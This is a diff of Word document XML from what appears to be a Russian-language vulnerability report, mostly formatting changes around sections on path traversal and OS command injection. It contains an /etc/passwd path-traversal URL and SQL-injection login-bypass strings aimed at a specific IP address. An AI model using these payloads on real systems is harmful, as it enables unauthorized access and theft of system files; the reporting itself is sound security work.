+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:highlight w:val="none"/>
@@ -16542,7 +16556,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -17313,7 +17327,6 @@
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
-          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -17347,6 +17360,7 @@
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -17366,7 +17380,14 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t xml:space="preserve">Path Traversal (Path Traversal Attack) - это тип атаки на безопасность веб-приложений, при которой злоумышленник пытается получить несанкционированный доступ к файловой системе сервера, обходя ограничения доступа и перемещаясь по файловой структуре. Целью а</w:t>
+        <w:t xml:space="preserve">P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ath Traversal (Path Traversal Attack) - это тип атаки на безопасность веб-приложений, при которой злоумышленник пытается получить несанкционированный доступ к файловой системе сервера, обходя ограничения доступа и перемещаясь по файловой структуре. Целью а</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17391,24 +17412,25 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t xml:space="preserve">Принцип работы Path Traversal заключается в использовании недостаточно проверенного или неэкранированного пользовательского ввода (обычно через URL или другие формы ввода), чтобы перейти за пределы корневого каталога веб-приложения и получить доступ к файла</w:t>
+        <w:t xml:space="preserve">П</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
+        <w:t xml:space="preserve">ринцип работы Path Traversal заключается в использовании недостаточно проверенного или неэкранированного пользовательского ввода (обычно через URL или другие формы ввода), чтобы перейти за пределы корневого каталога веб-приложения и получить доступ к файла</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
         <w:t xml:space="preserve">м или директориям на сервере.</w:t>
       </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
@@ -17470,15 +17492,13 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -17772,24 +17792,6 @@
                 <w:highlight w:val="none"/>
               </w:rPr>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -17864,12 +17866,6 @@
                 <w:highlight w:val="none"/>
               </w:rPr>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -18031,24 +18027,6 @@
                 <w:highlight w:val="none"/>
               </w:rPr>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:highlight w:val="none"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -18242,6 +18220,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18271,6 +18256,13 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18297,6 +18289,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18308,6 +18307,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -18356,7 +18362,7 @@
       <w:hyperlink r:id="rId66" w:tooltip="http://92.51.39.106:7799/read?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="18"/>
             <w:szCs w:val="18"/>
@@ -18366,7 +18372,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="18"/>
             <w:szCs w:val="18"/>
@@ -18375,7 +18381,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="18"/>
             <w:szCs w:val="18"/>
@@ -18383,7 +18389,6 @@
           </w:rPr>
         </w:r>
       </w:hyperlink>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -18393,6 +18398,15 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18415,6 +18429,12 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18438,6 +18458,12 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
     </w:p>
@@ -18509,7 +18535,14 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t xml:space="preserve">Remote OS Command Injection - это тип атаки на безопасность веб-приложений, при которой злоумышленник вводит и выполняет операционные системные команды на удаленном сервере через уязвимость в веб-приложении. Целью атаки является выполнение команд на сервере</w:t>
+        <w:t xml:space="preserve">R</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">emote OS Command Injection - это тип атаки на безопасность веб-приложений, при которой злоумышленник вводит и выполняет операционные системные команды на удаленном сервере через уязвимость в веб-приложении. Целью атаки является выполнение команд на сервере</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18534,24 +18567,25 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t xml:space="preserve">Принцип работы Remote OS Command Injection заключается в том, что злоумышленник вводит вредоносные команды в уязвимую форму ввода (например, поле для ввода веб-приложения), которые затем выполняются на сервере. Обычно атаки этого типа происходят, когда веб-</w:t>
+        <w:t xml:space="preserve">П</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
+        <w:t xml:space="preserve">ринцип работы Remote OS Command Injection заключается в том, что злоумышленник вводит вредоносные команды в уязвимую форму ввода (например, поле для ввода веб-приложения), которые затем выполняются на сервере. Обычно атаки этого типа происходят, когда веб-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
         <w:t xml:space="preserve">приложение не выполняет должной проверки и фильтрации пользовательского ввода, позволяя вводить и выполнить произвольные команды.</w:t>
       </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
@@ -18570,6 +18604,12 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -18613,7 +18653,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -19402,7 +19442,7 @@
       <w:hyperlink r:id="rId67" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -19410,7 +19450,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -19431,6 +19471,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19496,6 +19543,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19538,6 +19592,13 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19554,7 +19615,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
@@ -19590,7 +19651,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -19625,7 +19686,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -19649,13 +19710,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve">4.1</w:t>
         <w:tab/>
         <w:t xml:space="preserve">Exploitation proof</w:t>
@@ -19677,7 +19731,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19714,6 +19768,7 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -19723,42 +19778,13 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19775,6 +19801,14 @@
           <w:highlight w:val="none"/>
         </w:rPr>
         <w:t xml:space="preserve">Позволяет обойти систему авторизации сайте. Ниже приведены примеры эксплуатации:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19787,7 +19821,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="41"/>
@@ -19811,7 +19845,7 @@
       <w:hyperlink r:id="rId68" w:tooltip="http://92.51.39.106:8060/users/login.php." w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -19829,7 +19863,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19847,19 +19880,12 @@
         </w:rPr>
         <w:t xml:space="preserve">admin' or '1'='1'# </w:t>
       </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -19873,7 +19899,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19959,10 +19985,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="41"/>
@@ -19979,7 +20012,7 @@
       <w:hyperlink r:id="rId70" w:tooltip="http://92.51.39.106:7799/server.html." w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -19995,57 +20028,34 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В окне авторизации в поле логин ввести</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> admin' or 1=1--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В окне авторизации в поле логин ввести</w:t>
-      </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> admin' or 1=1--</w:t>
-      </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20133,10 +20143,17 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20165,23 +20182,22 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20189,6 +20205,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20206,7 +20229,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20247,7 +20270,7 @@
       <w:hyperlink r:id="rId72" w:tooltip="http://92.51.39.106:8060/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -20256,7 +20279,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
